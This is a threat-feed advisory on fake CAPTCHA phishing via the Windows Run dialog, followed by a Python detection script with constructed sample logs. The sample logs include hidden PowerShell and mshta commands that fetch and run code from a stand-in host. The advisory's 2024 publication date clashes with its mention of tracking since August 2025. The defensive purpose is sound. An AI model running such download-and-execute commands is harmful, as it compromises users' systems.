{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/captcha/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["high"],"_cs_tags":["phishing","captcha","social-engineering","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","CrowdStrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies potential fake CAPTCHA phishing attacks targeting Windows users. The attack relies on compromised websites with browser injects that display a fake CAPTCHA or a fake error message. The user is instructed to copy a malicious command and paste it into the Windows Run dialog box, where it executes via PowerShell, cmd.exe, or mshta.exe. The lure disguises arbitrary code execution as a legitimate verification step or fix, and a successful run typically leads to malware installation or system compromise. The rule looks for PowerShell, cmd.exe, or mshta.exe launched by explorer.exe (the parent of anything started from the Run dialog) with a command line containing CAPTCHA-related keywords, a combination that indicates a high likelihood of a phishing attempt. 
This activity started being tracked around August 2025 and continues to be a relevant threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser visits a compromised website displaying a fake CAPTCHA or error message.\u003c/li\u003e\n\u003cli\u003eThe website instructs the user to copy a command containing CAPTCHA-related keywords.\u003c/li\u003e\n\u003cli\u003eThe user pastes the command into the Windows Run dialog box.\u003c/li\u003e\n\u003cli\u003eExplorer.exe launches either PowerShell, cmd.exe, or mshta.exe.\u003c/li\u003e\n\u003cli\u003eThe launched process executes the malicious command.\u003c/li\u003e\n\u003cli\u003eThe malicious command may download and execute further payloads or scripts.\u003c/li\u003e\n\u003cli\u003eThese payloads can lead to malware installation or system compromise, giving the attacker unauthorized access to or control over the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of these attacks can lead to system compromise, data theft, or malware installation. Because the victim launches the command themselves, it runs in the user's own session with the user's privileges and bypasses controls that key on malicious downloads or e-mail attachments. The impact ranges from individual system infections to network-wide breaches if the initial foothold is used for lateral movement. 
A successful attack could result in significant data loss, financial damages, and reputational harm.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Fake CAPTCHA Phishing Attack via PowerShell\u0026rdquo; to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Fake CAPTCHA Phishing Attack via Mshta\u0026rdquo; to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules by examining the command line arguments, parent processes, and network connections.\u003c/li\u003e\n\u003cli\u003eThese rules key on the explorer.exe parent and on the CAPTCHA-related keywords still being present in the pasted command; a command pasted into an already open terminal, or a lure that strips the keywords, will not match, so pair them with broader parent-child process and network-download detections rather than relying on them alone.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1), or equivalent EDR process telemetry, so that the parent process and the full command line are available to these rules.\u003c/li\u003e\n\u003cli\u003eImplement user awareness training to educate users about the dangers of copying and pasting commands from untrusted websites.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:15:00Z","date_published":"2024-01-03T18:15:00Z","id":"/briefs/2024-01-fake-captcha/","summary":"This rule detects potential fake CAPTCHA phishing attacks on Windows systems where victims are tricked into copying and pasting malicious commands into the Windows Run dialog box.","title":"Potential Fake CAPTCHA Phishing Attack via Command Line","url":"https://feed.craftedsignal.io/briefs/2024-01-fake-captcha/"}],"language":"en","title":"CraftedSignal Threat Feed — Captcha","version":"https://jsonfeed.org/version/1.1"}
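The detection logic the brief describes, as an added example that is not the feed's or any vendor's rule: a Python script that applies the three conditions (explorer.exe parent, PowerShell/cmd.exe/mshta.exe child, CAPTCHA-related keyword in the command line) to Sysmon Event ID 1 style JSON records and extracts the URLs an analyst would pivot on. The keyword list, the mapping from child image to rule name, the field names and the sample log lines are all assumptions constructed for illustration.

```python
import json
import re
from typing import Optional

# Child processes the brief says explorer.exe launches from the Run dialog.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# CAPTCHA-related keywords, matched case-insensitively. Assumed list for the
# example; tune it against your own telemetry.
CAPTCHA_KEYWORDS = (
    "captcha",
    "i am not a robot",
    "i'm not a robot",
    "verify you are human",
    "verification id",
    "human verification",
)

# Assumed mapping from child image to the rule name the brief uses.
RULE_BY_CHILD = {
    "powershell.exe": "Potential Fake CAPTCHA Phishing Attack via PowerShell",
    "pwsh.exe": "Potential Fake CAPTCHA Phishing Attack via PowerShell",
    "cmd.exe": "Potential Fake CAPTCHA Phishing Attack via Command Line",
    "mshta.exe": "Potential Fake CAPTCHA Phishing Attack via Mshta",
}

URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path (accepts / or \\)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_event(event: dict) -> Optional[dict]:
    """Apply the detection to one Sysmon Event ID 1 style record.

    Fires only when the parent is explorer.exe (what the Run dialog spawns
    from), the child is one of the binaries the brief names, and the
    command line still carries a CAPTCHA-related keyword from the lure.
    """
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent != "explorer.exe" or child not in SUSPICIOUS_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "")
    lowered = cmdline.lower()
    hits = [kw for kw in CAPTCHA_KEYWORDS if kw in lowered]
    if not hits:
        return None
    return {
        "rule": RULE_BY_CHILD[child],
        "host": event.get("Computer", "?"),
        "user": event.get("User", "?"),
        "child": child,
        "keywords": hits,
        # URLs in the command line are the first pivot for the network
        # triage the brief recommends.
        "urls": URL_RE.findall(cmdline),
    }


def scan(log_lines):
    """Run match_event over newline-delimited JSON; bad lines are skipped."""
    findings = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = match_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry, not real captures. Only the first two records
# should fire: the third has no keyword, the fourth's parent is not
# explorer.exe (the rule's blind spot), and the fifth is not valid JSON.
SAMPLE_LOG = r'''
{"EventID":1,"Computer":"WS01","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iwr http://example.invalid/p.txt | iex\" # I am not a robot - reCAPTCHA Verification ID: 7811"}
{"EventID":1,"Computer":"WS02","User":"CORP\\bob","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://example.invalid/verify.hta # Verify you are human"}
{"EventID":1,"Computer":"WS03","User":"CORP\\carol","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -NoProfile"}
{"EventID":1,"Computer":"WS04","User":"CORP\\dave","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -File C:\\dev\\captcha_solver_tests.ps1"}
{"EventID":1,"Computer":"WS05" this record is truncated
'''


def run_sample():
    """Return the findings for SAMPLE_LOG (used by the demo below)."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for finding in run_sample():
        print(json.dumps(finding))
```

The fourth sample record is the one to keep in mind when tuning: a command that mentions CAPTCHA but is launched from cmd.exe rather than explorer.exe is silently ignored, which is exactly why the brief's rules should sit alongside broader parent-child and download-and-execute detections.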